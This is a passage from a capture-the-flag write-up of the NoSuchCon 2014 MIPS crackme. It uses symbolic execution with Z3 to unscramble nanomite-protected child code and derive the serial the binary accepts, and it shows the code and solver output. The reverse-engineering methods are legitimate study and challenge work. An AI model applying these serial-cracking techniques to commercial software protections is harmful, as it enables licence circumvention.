    # DO NOT FORGET TO ENABLE Z3 :)
    sym.enable_z3 = True
    a = BitVec('a', 32)
    sym.stack['var'] = a
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    sym.code = '''.doare:DEADBEEF                 lw      $v0, 0x318+var($fp)  # Load Word
.doare:DEADBEEF                 lw      $v1, 0x318+var2($fp)  # Load Word
.doare:DEADBEEF                 subu    $v0, $v1, $v0    #
.doare:DEADBEEF                 li      $v1, 0x446F8657  # Load Immediate
.doare:DEADBEEF                 multu   $v0, $v1         # Multiply Unsigned
.doare:DEADBEEF                 mfhi    $v1              # Move From HI
.doare:DEADBEEF                 subu    $v0, $v1         # Subtract Unsigned'''.split('\n')
    sym.run()

    print 'Symbolic mode:'
    print 'Resulting equation: %r' % sym.gpr['v0']
    print 'Resulting value if `a` is 0xdeadb44: %#.8x' % substitute(
        sym.gpr['v0'], (a, BitVecVal(0xdeadb44, 32))
    ).as_long()

    print '=' * 50
    emu = MiniMipsSymExecEngine('donotcare.log')
    emu.stack = sym.stack
    emu.stack['var'] = 0xdeadb44
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    emu.code = sym.code
    emu.run()

    print 'Emulator mode:'
    print 'Resulting value when `a` is 0xdeadb44: %#.8x' % emu.gpr['v0']
    print '=' * 50
    return 1

Which results in:

PS D:\Codes\NoSuchCon2014> python .\mini_mips_symexec_engine.py
==================================================
Symbolic mode:
Resulting equation: 3735928559 +
4294967295*a +
4294967295*
Extract(63,
        32,
        1148159575*Concat(0, 3735928559 + 4294967295*a))
Resulting value if `a` is 0xdeadb44: 0x98f42d24
==================================================
Emulator mode:
Resulting value when `a` is 0xdeadb44: 0x98f42d24
==================================================

Of course, I didn't mention a lot of details that still need to be addressed to have something working: simulating data areas, memory layouts, etc. If you are interested in those, you should read the codes in my NoSuchCon2014 folder.

Back into the battlefield

Here comes the important bits!

Extracting the function that generates the magic value from the son program counter

All right, the main objective in this part is to extract the formula that generates the first magic value. As we said earlier, this big block can be seen as a function that takes two arguments (or symbolic variables) and generates the magic DWORD in output. The first thing to do is to copy the code somewhere to feed it to our engine ; I decided to stick all the codes I needed into a separate Python file called code.py.

block_generate_magic_from_pc_son = '''.text:00400B8C                 lw      $v0, 0x318+pc_son($fp)  # Load Word
.text:00400B90                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400B94                 la      $v0, loc_400A78  # Load Address
.text:00400B9C                 lw      $v1, 0x318+tmp_pc($fp)  # Load Word
.text:00400BA0                 subu    $v0, $v1, $v0    # (regs.pc_father - 400A78)
.text:00400BA4                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400BA8                 lw      $v0, 0x318+var_300($fp)  # Load Word
.text:00400BAC                 li      $v1, 0x446F8657  # Load Immediate
.text:00400BB4                 multu   $v0, $v1         # Multiply Unsigned
.text:00400BB8                 mfhi    $v1              # Move From HI
.text:00400BBC                 subu    $v0, $v1         # Subtract Unsigned
[...]
.text:00401424                 lw      $v0, 0x318+var_2F0($fp)  # Load Word
.text:00401428                 nor     $v0, $zero, $v0  # NOR
.text:0040142C                 addiu   $v0, 0x20        # Add Immediate Unsigned
.text:00401430                 lw      $a0, 0x318+tmp_pc($fp)  # Load Word
.text:00401434                 sllv    $v0, $a0, $v0    # Shift Left Logical Variable
.text:00401438                 or      $v0, $v1, $v0    # OR
.text:0040143C                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word'''.split('\n')

Then we have to prepare the environment of our engine: the two symbolic variables are stack-variables, so we have to insert them in the context of our virtual environment. The resulting formula is going to be in $v0 at the end of the execution ; this the holy grail, the formula we are after.

def extract_equation_of_function_that_generates_magic_value():
  '''Here we do some magic to transform our mini MIPS emulator
  into a symbolic execution engine ; the purpose is to extract
  the formula of the function generating the 32-bits magic value'''

  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_magic_value.log')
  x.debug = False
  x.enable_z3 = True
  pc_son = BitVec('pc_son', 32)
  n_break = BitVec('n_break', 32)
  x.stack['pc_son'] =  pc_son
  x.stack['var_300'] = n_break
  emu_generate_magic_from_son_pc(x, print_final_state = False)
  compute_magic_equation = x.gpr['v0']
  with open(os.path.join('formulas', 'generate_magic_value_from_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_magic_equation, name = 'generate_magic_from_pc_son'))

  return pc_son, n_break, simplify(compute_magic_equation)

You can now keep in memory the formula & wrap this function in another one so that you can reuse it every time you need it:

var_magic, var_n_break, expr_magic = [None]*3
def generate_magic_from_son_pc_using_z3(pc_son, n_break):
  '''Generates the 32 bits magic value thanks to the output
  of the symbolic execution engine: run the analysis once, extract
  the complete equation & reuse it as much as you want'''
  global var_magic, var_n_break, expr_magic
  if var_magic is None and var_n_break is None and expr_magic is None:
    var_magic, var_n_break, expr_magic = extract_equation_of_function_that_generates_magic_value()

  return substitute(
    expr_magic,
    (var_magic, BitVecVal(pc_son, 32)),
    (var_n_break, BitVecVal(n_break, 32))
  ).as_long()

The power of using symbolic variables here lies in the fact that we don't need to run the emulator every single time you need to call this function ; you get once the generic formula and you just have to substitute the symbolic variables by the concrete values you want. This comes for free with our code, so let's use it heh :-).

; generate_magic_from_pc_son
(declare-fun n_break () (_ BitVec 32))
(declare-fun pc_son () (_ BitVec 32))
(let ((?x14 (bvadd n_break (bvmul (_ bv4294967295 32) ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))))
(let ((?x21 ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))
(let ((?x8 (bvadd ?x21 (concat (_ bv0 1) ((_ extract 31 1) ?x14)))))
(let ((?x26 ((_ extract 31 6) ?x8)))
(let ((?x24 (bvadd (_ bv32 32) (concat (_ bv63 6) (bvnot ?x26)))))
(let ((?x27 (concat (_ bv0 6) ?x26)))
(let ((?x42 (bvmul (_ bv4294967295 32) ?x27)))
(let ((?x67 ((_ extract 6 6) ?x8)))
(let ((?x120 ((_ extract 7 6) ?x8)))
(let ((?x38 (concat (bvadd (_ bv30088 15) ((_ extract 14 0) pc_son)) ((_ extract 31 15) (bvadd (_ bv4290770312 32) pc_son)))))
(let ((?x41 (bvxor (bvadd (bvor (bvlshr ?x38 (bvadd (_ bv1 32) ?x27)) (bvshl ?x38 ?x24)) ?x42) ?x27)))
(let ((?x63 (bvor ((_ extract 0 0) (bvlshr ?x38 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvshl ?x38 ?x24)))))
(let ((?x56 (concat (bvadd (_ bv1 1) (bvxor (bvadd ?x63 ?x67) ?x67)) ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)))))
(let ((?x66 (concat (bvadd ((_ extract 9 1) (bvadd (_ bv2142377237 32) ?x41)) ((_ extract 14 6) ?x8)) ((_ extract 31 31) (bvadd ?x56 ?x27)) ((_ extract 30 9) (bvadd ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)) (concat (_ bv0 5) ?x26))))))
(let ((?x118 (bvor ((_ extract 1 0) (bvshl ?x66 (bvadd (_ bv1 32) ?x27))) ((_ extract 1 0) (bvlshr ?x66 ?x24)))))
(let ((?x122 (bvnot (bvadd ?x118 ?x120))))
(let ((?x45 (bvadd (bvor (bvshl ?x66 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x66 ?x24)) ?x27)))
(let ((?x76 ((_ extract 4 2) ?x45)))
(let ((?x110 (bvnot ((_ extract 5 5) ?x45))))
(let ((?x55 ((_ extract 8 6) ?x45)))
(let ((?x108 (bvnot ((_ extract 10 9) ?x45))))
(let ((?x78 ((_ extract 13 11) ?x45)))
(let ((?x106 (bvnot ((_ extract 14 14) ?x45))))
(let ((?x80 ((_ extract 15 15) ?x45)))
(let ((?x104 (bvnot ((_ extract 16 16) ?x45))))
(let ((?x123 (concat (bvnot ((_ extract 31 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x50 (concat (bvnot ((_ extract 30 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x91 (bvadd (_ bv1720220585 32) (concat (bvnot (bvadd (_ bv612234822 31) ?x50)) (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) ?x42)))
(let ((?x137 (bvnot (bvadd (_ bv128582 17) (concat ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))))
(let ((?x146 (bvadd (_ bv31657 18) (concat ?x137 (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) (bvmul (_ bv262143 18) ((_ extract 23 6) ?x8)))))
(let ((?x131 (bvadd (_ bv2800103692 32) (concat ?x146 ((_ extract 31 18) ?x91)))))
(let ((?x140 (concat ((_ extract 18 18) ?x91) ((_ extract 31 31) ?x131) (bvnot ((_ extract 30 30) ?x131)) ((_ extract 29 27) ?x131) (bvnot ((_ extract 26 25) ?x131)) ((_ extract 24 24) ?x131) (bvnot ((_ extract 23 22) ?x131)) ((_ extract 21 21) ?x131) (bvnot ((_ extract 20 20) ?x131)) ((_ extract 19 19) ?x131) (bvnot ((_ extract 18 17) ?x131)) ((_ extract 16 14) ?x131) (bvnot ((_ extract 13 9) ?x131)) ((_ extract 8 8) ?x131) (bvnot ((_ extract 7 6) ?x131)) ((_ extract 5 4) ?x131) (bvnot ((_ extract 3 1) ?x131)))))
(let ((?x176 (bvnot (bvadd (concat ((_ extract 4 4) ?x131) (bvnot ((_ extract 3 1) ?x131))) ((_ extract 9 6) ?x8)))))
(let ((?x177 (bvadd (concat ?x176 (bvnot ((_ extract 31 4) (bvadd ?x140 ?x27)))) ?x42)))
(let ((?x187 (bvadd (bvnot ((_ extract 13 4) (bvadd ?x140 ?x27))) (bvmul (_ bv1023 10) ((_ extract 15 6) ?x8)))))
(let ((?x180 (concat (bvadd ((_ extract 23 10) ?x177) (bvmul (_ bv16383 14) ((_ extract 19 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x79 (bvadd (bvxor (bvadd ?x180 ?x27) ?x27) ?x42)))
(let ((?x211 (concat (bvadd ((_ extract 17 10) ?x177) (bvmul (_ bv255 8) ((_ extract 13 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x190 (concat (bvnot (bvadd (bvxor (bvadd ?x211 ?x26) ?x26) (bvmul (_ bv67108863 26) ?x26))) (bvnot ((_ extract 31 26) ?x79)))))
(let ((?x173 (bvadd (bvnot (bvadd (_ bv3113082326 32) ?x190 ?x27)) ?x27)))
(let ((?x174 ((_ extract 9 6) ?x8)))
(let ((?x255 ((_ extract 2 2) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x253 ((_ extract 3 3) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x144 ((_ extract 23 6) ?x8)))
(let ((?x233 ((_ extract 17 6) ?x8)))
(let ((?x235 (bvxor (bvadd ((_ extract 25 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)) ?x233) ?x233)))
(let ((?x244 (bvadd (_ bv122326 18) (concat (bvnot (bvadd ?x235 (bvmul (_ bv4095 12) ?x233))) (bvnot ((_ extract 31 26) ?x79))) ?x144)))
(let ((?x246 (bvadd (bvnot ?x244) ?x144)))
(let ((?x293 (concat (bvnot ((_ extract 24 23) ?x173)) ((_ extract 22 18) ?x173) ((_ extract 17 17) ?x246) (bvnot ((_ extract 16 16) ?x246)) ((_ extract 15 15) ?x246) (bvnot ((_ extract 14 12) ?x246)) ((_ extract 11 10) ?x246) (bvnot ((_ extract 9 9) ?x246)) ((_ extract 8 8) ?x246) (bvnot ((_ extract 7 7) ?x246)) ((_ extract 6 6) ?x246) (bvnot ((_ extract 5 4) ?x246)) (bvnot ?x253) ?x255 (bvnot (bvadd (bvnot (bvadd (_ bv2 2) (bvnot ((_ extract 27 26) ?x79)) ?x120)) ?x120)) (bvnot ((_ extract 31 29) ?x173)) ((_ extract 28 28) ?x173) (bvnot ((_ extract 27 26) ?x173)) ((_ extract 25 25) ?x173))))
(let ((?x324 (bvor ((_ extract 0 0) (bvshl ?x293 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvlshr ?x293 ?x24)))))
(let ((?x202 (bvadd (bvor (bvshl ?x293 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x293 ?x24)) ?x27)))
(let ((?x261 (concat ((_ extract 31 31) ?x202) (bvnot ((_ extract 30 29) ?x202)) ((_ extract 28 27) ?x202) (bvnot ((_ extract 26 25) ?x202)) ((_ extract 24 22) ?x202) (bvnot ((_ extract 21 18) ?x202)) ((_ extract 17 17) ?x202) (bvnot ((_ extract 16 15) ?x202)) ((_ extract 14 13) ?x202) (bvnot ((_ extract 12 12) ?x202)) ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x250 (concat ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x331 (bvadd (_ bv1397077939 32) (concat (bvadd (_ bv4018 12) ?x250) ((_ extract 31 12) (bvadd (_ bv1471406002 32) ?x261))) ?x27)))
(let ((?x264 (bvor (bvshl (bvadd (bvnot ?x331) ?x27) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (bvnot ?x331) ?x27) ?x24))))
(let ((?x298 (bvor (bvshl (bvadd (_ bv1031407080 32) ?x264 ?x42) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (_ bv1031407080 32) ?x264 ?x42) ?x24))))
(let ((?x231 (bvor ((_ extract 31 17) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 17) (bvlshr ?x298 ?x24)))))
(let ((?x220 (bvor ((_ extract 16 0) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 16 0) (bvlshr ?x298 ?x24)))))
(let ((?x283 (bvor (bvshl (concat ?x220 ?x231) (bvadd (_ bv1 32) ?x27)) (bvlshr (concat ?x220 ?x231) ?x24))))
(let ((?x119 (bvadd (_ bv4200859627 32) (bvnot (bvor (bvshl ?x283 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x283 ?x24))))))
(let ((?x201 (bvshl ?x119 ?x24)))
(let ((?x405 (bvadd (bvor ((_ extract 10 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 10 8) ?x201)) ((_ extract 8 6) ?x8))))
(let ((?x343 (concat (bvor ((_ extract 7 0) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 7 0) ?x201)) (bvor ((_ extract 31 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 8) ?x201)))))
(let ((?x199 (bvadd (_ bv752876532 32) (bvnot (bvadd ?x343 ?x27)) ?x27)))
(let ((?x409 (concat ((_ extract 31 29) ?x199) (bvnot ((_ extract 28 28) ?x199)) ((_ extract 27 27) ?x199) (bvnot ((_ extract 26 26) ?x199)) ((_ extract 25 25) ?x199) (bvnot ((_ extract 24 24) ?x199)) ((_ extract 23 23) ?x199) (bvnot ((_ extract 22 22) ?x199)) ((_ extract 21 21) ?x199) (bvnot ((_ extract 20 19) ?x199)) ((_ extract 18 18) ?x199) (bvnot ((_ extract 17 17) ?x199)) ((_ extract 16 16) ?x199) (bvnot ((_ extract 15 15) ?x199)) ((_ extract 14 11) ?x199) (bvnot ((_ extract 10 10) ?x199)) ((_ extract 9 9) ?x199) (bvnot ((_ extract 8 7) ?x199)) ((_ extract 6 6) ?x199) (bvnot ((_ extract 5 4) ?x199)) ((_ extract 3 3) ?x199) (bvnot (bvadd (_ bv4 3) (bvnot ?x405) ((_ extract 8 6) ?x8))))))
(let ((?x342 (bvlshr (bvadd (_ bv330202175 32) ?x409) ?x24)))
(let ((?x20 (bvadd (_ bv1 32) ?x27)))
(let ((?x337 (bvshl (bvadd (_ bv330202175 32) ?x409) ?x20)))
(let ((?x354 (bvadd (_ bv651919116 32) (bvor ?x337 ?x342))))
(let ((?x414 (concat (bvnot ((_ extract 26 26) ?x354)) ((_ extract 25 25) ?x354) (bvnot ((_ extract 24 24) ?x354)) (bvnot ((_ extract 23 23) ?x354)) ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x464 (concat ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x474 (concat (bvadd (_ bv141595581 28) (bvnot (bvxor (bvadd (_ bv178553293 28) ?x464) (concat (_ bv0 2) ?x26)))) ((_ extract 31 28) (bvadd (_ bv4168127421 32) (bvnot (bvxor (bvadd (_ bv2594472397 32) ?x414) ?x27)))))))
(let ((?x495 (bvadd (_ bv1994801052 32) (bvxor (_ bv1407993787 32) (bvor (bvshl ?x474 ?x20) (bvlshr ?x474 ?x24)) ?x27) ?x42)))
(let ((?x392 (concat (bvor ((_ extract 13 0) (bvlshr ?x495 ?x20)) ((_ extract 13 0) (bvshl ?x495 ?x24))) (bvor ((_ extract 31 14) (bvlshr ?x495 ?x20)) ((_ extract 31 14) (bvshl ?x495 ?x24))))))
(let ((?x388 (bvlshr ?x392 ?x24)))
(let ((?x494 (concat (bvnot (bvor ((_ extract 31 31) (bvshl ?x392 ?x20)) ((_ extract 31 31) ?x388))) (bvor ((_ extract 30 30) (bvshl ?x392 ?x20)) ((_ extract 30 30) ?x388)) (bvnot (bvor ((_ extract 29 27) (bvshl ?x392 ?x20)) ((_ extract 29 27) ?x388))) (bvor ((_ extract 26 25) (bvshl ?x392 ?x20)) ((_ extract 26 25) ?x388)) (bvnot (bvor ((_ extract 24 23) (bvshl ?x392 ?x20)) ((_ extract 24 23) ?x388))) (bvor ((_ extract 22 21) (bvshl ?x392 ?x20)) ((_ extract 22 21) ?x388)) (bvnot (bvor ((_ extract 20 16) (bvshl ?x392 ?x20)) ((_ extract 20 16) ?x388))) (bvor ((_ extract 15 15) (bvshl ?x392 ?x20)) ((_ extract 15 15) ?x388)) (bvnot (bvor ((_ extract 14 14) (bvshl ?x392 ?x20)) ((_ extract 14 14) ?x388))) (bvor ((_ extract 13 12) (bvshl ?x392 ?x20)) ((_ extract 13 12) ?x388)) (bvnot (bvor ((_ extract 11 10) (bvshl ?x392 ?x20)) ((_ extract 11 10) ?x388))) (bvor ((_ extract 9 8) (bvshl ?x392 ?x20)) ((_ extract 9 8) ?x388)) (bvnot (bvor ((_ extract 7 2) (bvshl ?x392 ?x20)) ((_ extract 7 2) ?x388))) (bvor ((_ extract 1 1) (bvshl ?x392 ?x20)) ((_ extract 1 1) ?x388)) (bvnot (bvor ((_ extract 0 0) (bvshl ?x392 ?x20)) ((_ extract 0 0) ?x388))))))
(let ((?x450 (bvor (bvlshr ?x494 ?x20) (bvshl ?x494 ?x24))))
(bvor (bvlshr ?x450 ?x20) (bvshl ?x450 ?x24)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Quite happy we don't have to study that right?

Extracting the function that generates the new program counter from the second magic value

For the second big block of code, we can do exactly the same thing: copy the code, configure the virtual environment with our symbolic variables and wrap the function:

def extract_equation_of_function_that_generates_new_son_pc():
  '''Extract the formula of the function generating the new son's $pc'''
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_new_son_pc.log')
  x.debug = False
  x.enable_z3 = True
  tmp_pc = BitVec('magic', 32)
  n_loop = BitVec('n_loop', 32)
  x.stack['tmp_pc'] = tmp_pc
  x.stack['var_2F0'] = n_loop
  emu_generate_new_pc_for_son(x, print_final_state = False)
  compute_pc_equation = simplify(x.gpr['v0'])
  with open(os.path.join('formulas', 'generate_new_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_pc_equation, name = 'generate_new_pc_son'))

  return tmp_pc, n_loop, compute_pc_equation

var_new_pc, var_n_loop, expr_new_pc = [None]*3
def generate_new_pc_from_magic_high(magic_high, n_loop):
  global var_new_pc, var_n_loop, expr_new_pc
  if var_new_pc is None and var_n_loop is None and expr_new_pc is None:
    var_new_pc, var_n_loop, expr_new_pc = extract_equation_of_function_that_generates_new_son_pc()

  return substitute(
      expr_new_pc,
      (var_new_pc, BitVecVal(magic_high, 32)),
      (var_n_loop, BitVecVal(n_loop, 32))
  ).as_long()

If you are interested in what the formula looks like, it is also available in the NoSuchCon2014 folder on my github.

Putting it all together: building a function that computes the new program counter of the son

Obviously, we don't really care about those two previous functions, we just want to combine them together to implement the computation of the new program counter from both the round number & where the son SIGTRAP'd. The only missing bits is the lookup in the QWORDs array to extract the second magic value. We just have to dump the array inside another file called memory.py. This is done with a simple IDA Python one-liner:

values = dict((0x00414130+i*8, Qword(0x00414130+i*8)) for i in range(0x25E))

Now, we can build the whole function easily by combining all those pieces:

def generate_new_pc_from_pc_son_using_z3(pc_son, n_break):
  '''Generate the new program counter from the address where the son SIGTRAP'd and
  the number of SIGTRAP the son encountered'''
  loop_n = (n_break / 101)
  magic = generate_magic_from_son_pc_using_z3(pc_son, n_break)
  idx = None
  for i in range(len(memory.pcs)):
    if (memory.pcs[i] & 0xffffffff) == magic:
      idx = i
      break

  assert(idx != None)
  return generate_new_pc_from_magic_high(memory.pcs[idx] >> 32, loop_n)

Sweet. Really sweet.

This basically means we are now able to unscramble the code of the son and reordering it completely without even physically running the binary nor generating traces.

Unscramble the code like a sir

Before showing, the code I just want to explain the process one more time:

  1. The son executes some code until it reaches a break instruction
  2. The father gets the $pc of the son and the variable that counts the number of break instruction the son executed
  3. The father generates a new $pc value from those two variables
  4. The father sets the new $pc
  5. The father continues its son
  6. Goto 1!

So basically to unscramble the code, we just need to simulate what the father would do & log everything somewhere. Couple of important details though:

  • There are exactly 101 break instructions in the son, so 101 chunks of code will be executed and need to be reordered,
  • The son is executing 6 rounds ; that's exactly why the QWORD array has 6*101 entries.

Here is the function I used:

def generate_son_code_reordered(debug = False):
    '''This functions puts in the right order the son's block of codes without
    relying on the father to set a new $pc value when a break is executed in the son.
    With this output we are good to go to create a nanomites-less binary:
      - We don't need the father anymore (he was driving the son)
      - We have the code in the right order, so we can also remove the break instructions
    It will also be quite useful when we want to execute symbolic-ly its code.
    '''
    def parse_line(l):
        addr_seg, instr, _ = l.split(None, 2)
        _, addr = addr_seg.split(':')
        return int('0x%s' % addr, 0), instr

    son_code = code.block_code_of_son
    next_break = 0
    n_break = 0
    cleaned_code = []
    for _ in range(6):
        for z in range(101):
            i = 0
            while i < len(son_code):
                line = son_code[i]
                addr, instr = parse_line(line)
                if instr == 'break' and (next_break == addr or z == 0):
                    break_addr = addr
                    new_pc = generate_new_pc_from_pc_son_using_z3(break_addr, n_break)
                    n_break += 1
                    if debug:
                        print '; Found the %dth break (@%.8x) ; new pc will be %.8x' % (z, break_addr, new_pc)
                    state = 'Begin'
                    block = []
                    j = 0
                    while j < len(son_code):
                        line = son_code[j]
                        addr, instr = parse_line(line)
                        if state == 'Begin':
                            if addr == new_pc:
                                block.append(line)
                                state = 'Log'
                        elif state == 'Log':
                            if instr == 'break':
                                next_break = addr
                                state = 'End'
                            else:
                                block.append(line)
                        elif state == 'End':
                            break
                        else:
                            pass
                        j += 1

                    if debug:
                        print ';', '='*25, 'BLOCK %d' % z, '='*25
                        print '\n'.join(block)
                    cleaned_code.extend(block)
                    break
                i += 1

    return cleaned_code

And there it is :-)

The function outputs the unrolled and ordered code of the son. If you want to push further, you could theoretically perform an open-heart surgery to completely remove the nanomites from the original binary, isn't it cool? This is left as an exercise for the interested reader though :-)).

Attacking the son: the last man standing

Now that we have the code unscrambled, we can directly feed it to our engine but before doing so here are some details:

  • As we said earlier, it looks like the son is executing 6 times the same code. This is not the case at all, every round will execute the same amount of instructions but not in the same order
  • The computations executed can be seen as some kind of light encoding/encryption or decoding/decryption algorithm
  • We have 6 rounds because the input serial is broken into 6 DWORDs (so 6 symbolic variables) ; so basically each round is going to generate an output DWORD

As previously, we need to copy the code we want to execute. Note that we can also use generate_son_code_reorganized to generate it dynamically. Next step is to configure the virtual environment and we are good to finally run the code:

def get_serial():
  print '> Instantiating the symbolic execution engine..'
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('decrypt_serial.log')
  x.enable_z3 = True

  print '> Generating dynamically the code of the son & reorganizing/cleaning it..'
  # If you don't want to generate it dynamically like a sir, I've copied a version inside
  # code.block_code_of_son_reorganized_loop_unrolled :-)
  x.code = generate_son_code_reorganized()

  print '> Configuring the virtual environement..'
  x.gpr['fp'] = 0x7fff6cb0
  x.stack_offsets['var_30'] = 24
  start_addr = x.gpr['fp'] + x.stack_offsets['var_30'] + 8
  # (gdb) x/6dwx $s8+24+8
  # 0x7fff6cd0:     0x11111111      0x11111111      0x11111111
  #                 0x11111111      0x11111111      0x11111111
  a, b, c, d, e, f = BitVecs('a b c d e f', 32)
  x.mem[start_addr +  0] = a
  x.mem[start_addr +  4] = b
  x.mem[start_addr +  8] = c
  x.mem[start_addr + 12] = d
  x.mem[start_addr + 16] = e
  x.mem[start_addr + 20] = f

  print '> Running the code..'
  x.run()

The thing that matters this time is to find a, b, c, d, e, f so that they generate specific outputs ; so this is where Z3 is going to help us a lot. Thanks to that guy we don't need to manually invert the algorithm.

The final bit now is basically just about setting up the solver, setting the correct constraints and generating the serial you guys have been waiting for so long:

print '> Instantiating & configuring the solver..'
s = Solver()
s.add(
  x.mem[start_addr +   0] == 0x7953205b, x.mem[start_addr +   4] == 0x6b63616e,
  x.mem[start_addr +   8] == 0x20766974, x.mem[start_addr +  12] == 0x534e202b, 
  x.mem[start_addr +  16] == 0x203d2043, x.mem[start_addr +  20] == 0x5d20333c,
)

print '> Solving..'
if s.check() == sat:
  print '> Constraints solvable, here are the 6 DWORDs:'
  m = s.model()
  for i in (a, b, c, d, e, f):
    print ' %r = 0x%.8X' % (i, m[i].as_long())

  print '> Serial:', ''.join(('%.8x' % m[i].as_long())[::-1] for i in (a, b, c, d, e, f)).upper()
else:
  print '! Constraints unsolvable'

There we are, the final moment; drum roll

PS D:\Codes\NoSuchCon2014> python .\solve_nsc2014_step1_z3.py
==================================================
Tests OK -- you are fine to go
==================================================
> Instantiating the symbolic execution engine..
> Generating dynamically the code of the son & reorganizing/cleaning it..
> Configuring the virtual environement..
> Running the code..
> Instantiating & configuring the solver..
> Solving..
> Constraints solvable, here are the 6 DWORDs:
  a = 0xFE446223
  b = 0xBA770149
  c = 0x75BA5111
  d = 0x78EA3635
  e = 0xA9D6E85F
  f = 0xCC26C5EF
> Serial: 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
==================================================

overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[...]
Debian GNU/Linux 7 debian-mipsel ttyS0

debian-mipsel login: root
Password:
[...]
root@debian-mipsel:~# /home/user/crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
good job!
Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/

Boom :-).

Alternative solution

In this part, I present an alternate solution to solve the challenge. It's somehow a shortcut, since it requires much less coding than Axel's one, and uses the awesome Miasm framework.

Shortcut #1 : Tracing the parent with GDB

Quick recap of the parent's behaviour

